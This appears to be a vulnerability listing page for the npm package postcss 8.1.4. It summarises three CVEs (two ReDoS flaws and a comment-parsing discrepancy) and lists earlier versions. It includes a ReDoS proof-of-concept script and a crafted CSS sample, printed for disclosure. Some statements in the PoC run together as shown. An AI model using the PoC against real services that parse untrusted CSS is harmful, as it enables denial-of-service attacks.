NodeJS/postcss/8.1.4
Tool for transforming styles with JS plugins
https://www.npmjs.com/package/postcss
MIT
3 Security Vulnerabilities
Regular Expression Denial of Service in postcss
- https://nvd.nist.gov/vuln/detail/CVE-2021-23382
- https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641
- https://snyk.io/vuln/SNYK-JS-POSTCSS-1255640
- https://github.com/advisories/GHSA-566m-qj78-rww5
- https://github.com/postcss/postcss/releases/tag/7.0.36
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
regex
\/\*\s* sourceMappingURL=(.*)
PoC
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
- https://nvd.nist.gov/vuln/detail/CVE-2023-44270
- https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5
- https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25
- https://github.com/postcss/postcss/releases/tag/8.4.31
- https://github.com/advisories/GHSA-7fh5-64p2-3v2j
- https://github.com/github/advisory-database/issues/2820
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r
discrepancies, as demonstrated by @font-face{ font:(\r/*);}
in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
Regular Expression Denial of Service in postcss
- https://nvd.nist.gov/vuln/detail/CVE-2021-23368
- https://github.com/advisories/GHSA-hwj9-h5mp-3pm3
- https://github.com/postcss/postcss/commit/8682b1e4e328432ba692bed52326e84439cec9e4
- https://github.com/postcss/postcss/commit/b6f3e4d5a8d7504d553267f80384373af3a3dec5
- https://lists.apache.org/thread.html/r00158f5d770d75d0655c5eef1bdbc6150531606c8f8bcb778f0627be@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r16e295b4f02d81b79981237d602cb0b9e59709bafaa73ac98be7cef1@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r49afb49b38748897211b1f89c3a64dc27f9049474322b05715695aab@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r5acd89f3827ad9a9cad6d24ed93e377f7114867cd98cfba616c6e013@%3Ccommits.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r8def971a66cf3e375178fbee752e1b04a812a047cc478ad292007e33@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/rad5af2044afb51668b1008b389ac815a28ecea9eb75ae2cab5a00ebb@%3Ccommits.myfaces.apache.org%3E
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1244795
- https://snyk.io/vuln/SNYK-JS-POSTCSS-1090595
- https://github.com/postcss/postcss/commit/54cbf3c4847eb0fb1501b9d2337465439e849734
The npm package postcss
from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
252 Other Versions
Version | License | Security | Released | |
---|---|---|---|---|
0.1.0 | MIT | 2 | 2013-11-04 - 20:21 | over 10 years |
0.2.0 | MIT | 2 | 2013-12-17 - 23:47 | over 10 years |
0.3.0 | MIT | 2 | 2014-02-13 - 19:31 | about 10 years |
0.3.1 | MIT | 2 | 2014-02-18 - 12:28 | about 10 years |
0.3.2 | MIT | 2 | 2014-02-19 - 11:04 | about 10 years |
0.3.3 | MIT | 2 | 2014-03-02 - 09:14 | about 10 years |
0.3.4 | MIT | 2 | 2014-03-03 - 20:24 | about 10 years |
0.3.5 | MIT | 2 | 2014-05-30 - 05:55 | almost 10 years |
1.0.0 | MIT | 2 | 2014-06-23 - 04:53 | almost 10 years |
2.0.0 | MIT | 2 | 2014-07-23 - 06:50 | almost 10 years |
2.1.0 | MIT | 2 | 2014-07-27 - 09:11 | almost 10 years |
2.1.1 | MIT | 2 | 2014-08-06 - 21:49 | almost 10 years |
2.1.2 | MIT | 2 | 2014-08-08 - 19:35 | almost 10 years |
2.2.0 | MIT | 2 | 2014-08-17 - 14:53 | over 9 years |
2.2.1 | MIT | 2 | 2014-08-22 - 12:30 | over 9 years |
2.2.2 | MIT | 2 | 2014-08-27 - 15:24 | over 9 years |
2.2.3 | MIT | 2 | 2014-08-27 - 23:14 | over 9 years |
2.2.4 | MIT | 2 | 2014-09-01 - 17:52 | over 9 years |
2.2.5 | MIT | 2 | 2014-09-24 - 20:51 | over 9 years |
2.2.6 | MIT | 2 | 2014-10-31 - 20:54 | over 9 years |
3.0.0 | MIT | 2 | 2014-11-11 - 22:14 | over 9 years |
3.0.1 | MIT | 2 | 2014-11-13 - 18:48 | over 9 years |
3.0.2 | MIT | 2 | 2014-11-14 - 13:59 | over 9 years |
3.0.3 | MIT | 2 | 2014-11-21 - 12:55 | over 9 years |
3.0.4 | MIT | 2 | 2014-11-22 - 08:29 | over 9 years |
3.0.5 | MIT | 2 | 2014-11-27 - 20:38 | over 9 years |
3.0.6 | MIT | 2 | 2014-12-07 - 21:07 | over 9 years |
3.0.7 | MIT | 2 | 2014-12-09 - 09:18 | over 9 years |
4.0.0 | MIT | 2 | 2014-12-30 - 12:41 | over 9 years |
4.0.1 | MIT | 2 | 2015-01-11 - 18:49 | over 9 years |
4.0.2 | MIT | 2 | 2015-01-24 - 17:18 | over 9 years |
4.0.3 | MIT | 2 | 2015-01-28 - 12:46 | over 9 years |
4.0.4 | MIT | 2 | 2015-02-14 - 10:49 | about 9 years |
4.0.5 | MIT | 2 | 2015-02-23 - 13:35 | about 9 years |
4.0.6 | MIT | 2 | 2015-02-24 - 12:45 | about 9 years |
4.1.0 | MIT | 2 | 2015-04-01 - 15:46 | about 9 years |
4.1.1 | MIT | 2 | 2015-04-02 - 07:21 | about 9 years |
4.1.2 | MIT | 2 | 2015-04-02 - 11:23 | about 9 years |
4.1.3 | MIT | 2 | 2015-04-05 - 18:56 | about 9 years |
4.1.4 | MIT | 2 | 2015-04-05 - 23:58 | about 9 years |
4.1.5 | MIT | 2 | 2015-04-13 - 21:53 | about 9 years |
4.1.6 | MIT | 2 | 2015-04-26 - 17:49 | about 9 years |
4.1.7 | MIT | 2 | 2015-04-28 - 22:41 | about 9 years |
4.1.8 | MIT | 2 | 2015-05-01 - 00:22 | about 9 years |
4.1.9 | MIT | 2 | 2015-05-05 - 10:45 | about 9 years |
4.1.10 | MIT | 2 | 2015-05-11 - 18:09 | about 9 years |
4.1.11 | MIT | 2 | 2015-05-16 - 17:32 | almost 9 years |
4.1.12 | MIT | 2 | 2015-06-22 - 02:10 | almost 9 years |
4.1.13 | MIT | 2 | 2015-06-23 - 23:05 | almost 9 years |
4.1.14 | MIT | 2 | 2015-07-04 - 11:05 | almost 9 years |
4.1.15 | MIT | 2 | 2015-07-07 - 15:32 | almost 9 years |
4.1.16 | MIT | 2 | 2015-07-07 - 18:56 | almost 9 years |
5.0.0 | MIT | 2 | 2015-08-19 - 19:11 | over 8 years |
5.0.1 | MIT | 2 | 2015-08-20 - 21:34 | over 8 years |
5.0.2 | MIT | 2 | 2015-08-22 - 14:25 | over 8 years |
5.0.3 | MIT | 2 | 2015-08-28 - 22:04 | over 8 years |
5.0.4 | MIT | 2 | 2015-09-01 - 18:24 | over 8 years |
5.0.5 | MIT | 2 | 2015-09-12 - 10:36 | over 8 years |
5.0.6 | MIT | 2 | 2015-09-21 - 16:42 | over 8 years |
5.0.7 | MIT | 2 | 2015-09-25 - 10:33 | over 8 years |
5.0.8 | MIT | 2 | 2015-09-25 - 11:16 | over 8 years |
5.0.9 | MIT | 2 | 2015-10-08 - 18:32 | over 8 years |
5.0.10 | MIT | 2 | 2015-10-14 - 23:46 | over 8 years |
5.0.11 | MIT | 2 | 2015-11-07 - 14:03 | over 8 years |
5.0.12 | MIT | 2 | 2015-11-13 - 15:27 | over 8 years |
5.0.13 | MIT | 2 | 2015-12-16 - 14:01 | over 8 years |
5.0.14 | MIT | 2 | 2016-01-03 - 21:47 | over 8 years |
5.0.15 | MIT | 2 | 2016-02-11 - 14:22 | about 8 years |
5.0.16 | MIT | 2 | 2016-02-14 - 08:54 | about 8 years |
5.0.17 | MIT | 2 | 2016-02-26 - 16:10 | about 8 years |
5.0.18 | MIT | 2 | 2016-02-29 - 08:33 | about 8 years |
5.0.19 | MIT | 2 | 2016-03-02 - 18:51 | about 8 years |
5.0.20 | MIT | 2 | 2016-05-01 - 06:09 | about 8 years |
5.0.21 | MIT | 2 | 2016-05-02 - 16:12 | about 8 years |
5.1.0 | MIT | 2 | 2016-07-12 - 16:39 | almost 8 years |
5.1.1 | MIT | 2 | 2016-07-26 - 09:03 | almost 8 years |
5.1.2 | MIT | 2 | 2016-08-06 - 18:02 | almost 8 years |
5.2.0 | MIT | 2 | 2016-09-07 - 04:29 | over 7 years |
5.2.1 | MIT | 2 | 2016-09-26 - 12:11 | over 7 years |
5.2.2 | MIT | 2 | 2016-09-26 - 12:58 | over 7 years |
5.2.3 | MIT | 2 | 2016-09-29 - 09:50 | over 7 years |
5.2.4 | MIT | 2 | 2016-09-30 - 05:20 | over 7 years |
5.2.5 | MIT | 2 | 2016-10-20 - 12:26 | over 7 years |
5.2.6 | MIT | 2 | 2016-11-22 - 12:55 | over 7 years |
5.2.7 | MIT | 2 | 2016-12-24 - 08:46 | over 7 years |
5.2.8 | MIT | 2 | 2016-12-26 - 08:08 | over 7 years |
5.2.9 | MIT | 2 | 2017-01-09 - 07:15 | over 7 years |
5.2.10 | MIT | 2 | 2017-01-12 - 07:51 | over 7 years |
5.2.11 | MIT | 2 | 2017-01-20 - 08:48 | over 7 years |
5.2.12 | MIT | 2 | 2017-02-05 - 21:32 | over 7 years |
5.2.13 | MIT | 2 | 2017-02-14 - 11:19 | about 7 years |
5.2.14 | MIT | 2 | 2017-02-17 - 09:03 | about 7 years |
5.2.15 | MIT | 2 | 2017-02-22 - 12:00 | about 7 years |
5.2.16 | MIT | 2 | 2017-03-07 - 15:51 | about 7 years |
5.2.17 | MIT | 2 | 2017-04-13 - 22:57 | about 7 years |
6.0.0 | MIT | 2 | 2017-05-06 - 11:44 | about 7 years |
6.0.1 | MIT | 2 | 2017-05-07 - 11:37 | about 7 years |
6.0.2 | MIT | 2 | 2017-06-12 - 18:47 | almost 7 years |
6.0.3 | MIT | 2 | 2017-06-23 - 19:17 | almost 7 years |
6.0.4 | MIT | 2 | 2017-06-30 - 11:39 | almost 7 years |